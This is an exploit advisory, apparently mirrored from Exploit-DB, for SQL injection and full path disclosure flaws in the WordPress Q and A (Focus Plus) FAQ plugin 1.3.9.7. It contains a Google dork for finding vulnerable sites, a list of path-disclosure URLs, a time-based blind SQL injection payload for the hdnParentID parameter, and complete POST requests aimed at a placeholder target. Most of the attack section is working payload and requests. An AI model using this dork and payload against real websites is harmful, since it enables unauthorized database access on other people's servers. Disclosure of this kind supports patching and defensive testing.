WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 – Multiple Vulnerabilities

  • 作者: Gwendal Le Coguic
    日期: 2016-05-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39806/
  • # Exploit Title: WordPress Q and A (Focus Plus) FAQ Full Path Disclosure and SQL Injection
    # Google Dork: inurl:"wp-content/plugins/q-and-a"
    # Date: 12-05-2016
    # Software Link: https://wordpress.org/plugins/q-and-a-focus-plus-faq/
    # Version: 1.3.9.7 and prior
    # Exploit Author: Gwendal Le Coguic
    # Website: http://10degres.net
    # Category: webapps
    
    
    Create a powerful and easy to use FAQ & knowledge base on your WordPress site.
    A powerful and easy to use full-featured FAQ with comments, tags and ratings for your WordPress site.
    
    The plugin was originally named "Q and A FAQ" and developped by Raygun company 
    then it has been involved and renamed to "Q and A Focus Plus FAQ" by Lanexatek Creations.
    
    
    ##### Full Path Disclosure #####
    
    http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/q-and-a-focus-plus.php
    http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/q-a-focus-plus-admin.php
    http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/documentation.php
    http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/custom-post.php
    http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/functions.php
    http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/ratings.php
    http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/reorder.php
    http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/shortcodes.php
    http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/upgrader.php
    http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/widgets.php
    
    
    ##### SQL Injection #####
    
    Those vulnerabilities are mitigated by the fact that you have to be connected as an admin to exploit them.
    
    Paramater hdnParentID is vulnerable in two places.
    Payload: 0 AND (SELECT * FROM (SELECT(SLEEP(5)))zeCb)
    
    1/ line 46: $parentsParent = $wpdb->get_row("SELECT post_parent FROM $wpdb->posts WHERE ID = " . $_POST['hdnParentID']...
    
    POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
    Host: [target]
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 165
    
    btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&btnReturnParent=Return+to+parent+page&hdnParentID=0
    
    
    2/ line 254: $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE post_parent = $parentID and ...
    
    POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
    Host: [target]
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 84
    
    btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&hdnParentID=0
    
    
    ##### References #####
    
    https://www.owasp.org/index.php/Full_Path_Disclosure
    https://www.owasp.org/index.php/SQL_Injection